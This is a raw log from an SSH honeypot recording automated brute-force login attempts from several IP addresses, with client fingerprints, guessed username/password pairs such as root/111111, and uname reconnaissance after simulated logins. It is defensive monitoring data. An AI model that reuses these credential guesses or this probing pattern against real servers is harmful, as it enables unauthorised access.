{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:27:40.619019Z","src_ip":"41.226.27.251","session":"64859a53e096"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:27:40.620361Z","src_ip":"41.226.27.251","session":"64859a53e096"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59648,"dst_ip":"1.2.3.4","dst_port":22,"session":"50c16d7d9aab","protocol":"ssh","message":"New connection: 212.227.125.160:59648 (1.2.3.4:22) [session: 50c16d7d9aab]","sensor":"my-vps","timestamp":"2025-08-31T03:27:42.001698Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:27:45.221080Z","src_ip":"212.227.235.229","session":"9a8398572f74"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":60432,"dst_ip":"1.2.3.4","dst_port":22,"session":"988de8dafffb","protocol":"ssh","message":"New connection: 41.226.27.251:60432 (1.2.3.4:22) [session: 988de8dafffb]","sensor":"my-vps","timestamp":"2025-08-31T03:28:00.177072Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:28:00.178001Z","src_ip":"41.226.27.251","session":"988de8dafffb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:28:00.221061Z","src_ip":"41.226.27.251","session":"988de8dafffb"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:28:00.352812Z","src_ip":"41.226.27.251","session":"988de8dafffb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:28:00.458166Z","src_ip":"41.226.27.251","session":"988de8dafffb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:28:00.458791Z","src_ip":"41.226.27.251","session":"988de8dafffb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:28:00.502792Z","src_ip":"41.226.27.251","session":"988de8dafffb"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:28:00.504141Z","src_ip":"41.226.27.251","session":"988de8dafffb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:28:00.591421Z","src_ip":"212.227.125.160","session":"50c16d7d9aab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:28:00.592111Z","src_ip":"212.227.125.160","session":"50c16d7d9aab"}
{"eventid":"cowrie.session.connect","src_ip":"34.14.223.46","src_port":46134,"dst_ip":"1.2.3.4","dst_port":22,"session":"55bd80b6b5dd","protocol":"ssh","message":"New connection: 34.14.223.46:46134 (1.2.3.4:22) [session: 55bd80b6b5dd]","sensor":"my-vps","timestamp":"2025-08-31T03:28:00.759192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:28:00.777047Z","src_ip":"34.14.223.46","session":"55bd80b6b5dd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:28:01.028256Z","src_ip":"34.14.223.46","session":"55bd80b6b5dd"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:28:02.787497Z","src_ip":"34.14.223.46","session":"55bd80b6b5dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:28:03.548476Z","src_ip":"34.14.223.46","session":"55bd80b6b5dd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:28:03.549195Z","src_ip":"34.14.223.46","session":"55bd80b6b5dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:28:04.010651Z","src_ip":"34.14.223.46","session":"55bd80b6b5dd"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:28:04.012063Z","src_ip":"34.14.223.46","session":"55bd80b6b5dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42142,"dst_ip":"1.2.3.4","dst_port":22,"session":"c05527a816c5","protocol":"ssh","message":"New connection: 212.227.235.229:42142 (1.2.3.4:22) [session: c05527a816c5]","sensor":"my-vps","timestamp":"2025-08-31T03:28:05.215459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:28:05.947787Z","src_ip":"212.227.235.229","session":"c05527a816c5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:28:05.948920Z","src_ip":"212.227.235.229","session":"c05527a816c5"}
{"eventid":"cowrie.login.failed","username":"guest","password":"password1","message":"login attempt [guest/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T03:28:08.599373Z","src_ip":"212.227.235.229","session":"c05527a816c5"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:28:10.336940Z","src_ip":"212.227.235.229","session":"c05527a816c5"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":54758,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae8822304191","protocol":"ssh","message":"New connection: 41.226.27.251:54758 (1.2.3.4:22) [session: ae8822304191]","sensor":"my-vps","timestamp":"2025-08-31T03:28:20.120924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:28:20.218638Z","src_ip":"41.226.27.251","session":"ae8822304191"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:28:20.219362Z","src_ip":"41.226.27.251","session":"ae8822304191"}
{"eventid":"cowrie.login.failed","username":"wang","password":"123456","message":"login attempt [wang/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:28:20.396478Z","src_ip":"41.226.27.251","session":"ae8822304191"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:28:21.634068Z","src_ip":"41.226.27.251","session":"ae8822304191"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63410,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3e37b14596c","protocol":"ssh","message":"New connection: 212.227.125.160:63410 (1.2.3.4:22) [session: e3e37b14596c]","sensor":"my-vps","timestamp":"2025-08-31T03:28:22.019133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-paramiko_3.5.1","message":"Remote SSH version: SSH-2.0-paramiko_3.5.1","sensor":"my-vps","timestamp":"2025-08-31T03:28:22.028730Z","src_ip":"212.227.125.160","session":"e3e37b14596c"}
{"eventid":"cowrie.client.kex","hassh":"a2de0f306611e0957be704f5b0e35a82","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc,aes128-gcm@openssh.com,aes256-gcm@openssh.com;hmac-sha2-256,hmac-sha2-512,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-md5,hmac-sha1-96,hmac-md5-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc","aes128-gcm@openssh.com","aes256-gcm@openssh.com"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-md5","hmac-sha1-96","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a2de0f306611e0957be704f5b0e35a82","sensor":"my-vps","timestamp":"2025-08-31T03:28:22.209322Z","src_ip":"212.227.125.160","session":"e3e37b14596c"}
{"eventid":"cowrie.login.success","username":"root","password":"john@123","message":"login attempt [root/john@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:28:22.889310Z","src_ip":"212.227.125.160","session":"e3e37b14596c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:28:23.263850Z","src_ip":"212.227.125.160","session":"e3e37b14596c"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T03:28:23.264578Z","src_ip":"212.227.125.160","session":"e3e37b14596c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49058,"dst_ip":"1.2.3.4","dst_port":22,"session":"4faeaf351512","protocol":"ssh","message":"New connection: 212.227.235.229:49058 (1.2.3.4:22) [session: 4faeaf351512]","sensor":"my-vps","timestamp":"2025-08-31T03:28:23.320581Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:28:23.449635Z","src_ip":"212.227.125.160","session":"e3e37b14596c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:28:23.451372Z","src_ip":"212.227.125.160","session":"e3e37b14596c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:28:23.551860Z","src_ip":"212.227.235.229","session":"9a8398572f74"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:28:23.552665Z","src_ip":"212.227.235.229","session":"9a8398572f74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32954,"dst_ip":"1.2.3.4","dst_port":22,"session":"6db7066995e3","protocol":"ssh","message":"New connection: 212.227.125.160:32954 (1.2.3.4:22) [session: 6db7066995e3]","sensor":"my-vps","timestamp":"2025-08-31T03:28:27.060654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:28:27.569134Z","src_ip":"212.227.125.160","session":"6db7066995e3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:28:27.569827Z","src_ip":"212.227.125.160","session":"6db7066995e3"}
{"eventid":"cowrie.login.failed","username":"guest","password":"password1","message":"login attempt [guest/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T03:28:29.691197Z","src_ip":"212.227.125.160","session":"6db7066995e3"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:28:31.055336Z","src_ip":"212.227.125.160","session":"6db7066995e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50906,"dst_ip":"1.2.3.4","dst_port":22,"session":"086ce152d6a6","protocol":"ssh","message":"New connection: 212.227.125.160:50906 (1.2.3.4:22) [session: 086ce152d6a6]","sensor":"my-vps","timestamp":"2025-08-31T03:28:37.148813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:28:37.150262Z","src_ip":"212.227.125.160","session":"086ce152d6a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:28:37.399808Z","src_ip":"212.227.125.160","session":"086ce152d6a6"}
{"eventid":"cowrie.login.failed","username":"moodle","password":"dell@2019","message":"login attempt [moodle/dell@2019] failed","sensor":"my-vps","timestamp":"2025-08-31T03:28:38.400216Z","src_ip":"212.227.125.160","session":"086ce152d6a6"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:28:39.654793Z","src_ip":"212.227.125.160","session":"086ce152d6a6"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":55790,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a7671840f0e","protocol":"ssh","message":"New connection: 41.226.27.251:55790 (1.2.3.4:22) [session: 4a7671840f0e]","sensor":"my-vps","timestamp":"2025-08-31T03:28:40.066967Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:28:40.069380Z","src_ip":"41.226.27.251","session":"4a7671840f0e"}
